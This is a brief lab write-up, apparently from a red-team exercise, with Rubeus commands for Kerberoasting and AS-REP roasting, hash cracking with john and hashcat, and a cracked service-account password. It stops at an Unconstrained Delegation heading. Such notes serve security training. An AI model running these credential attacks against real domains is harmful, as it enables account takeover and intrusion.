Kerberoasting

Let’s get the kerberoastable Accounts.

execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe kerberoast /simple /nowrap

image.png

Now let’s try to crack the hashes.

john crackme.txt --wordlist=pass.txt

image.png

and we cracked the hash of the mssql-service.

Username: mssql_svc
Password: Cyberb0tic

ASREP Roasting

First Let’s enumerate the ASREP users.

C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe asreproast /user:squid_svc /nowrap

image.png

Now let’s crack the hash.

hashcat -a 0 -m 18200 crackme.txt /usr/share/wordlists/rockyou.txt

image.png

Unconstrained Delegation

Let’s abuse the Unconstrained Delegation.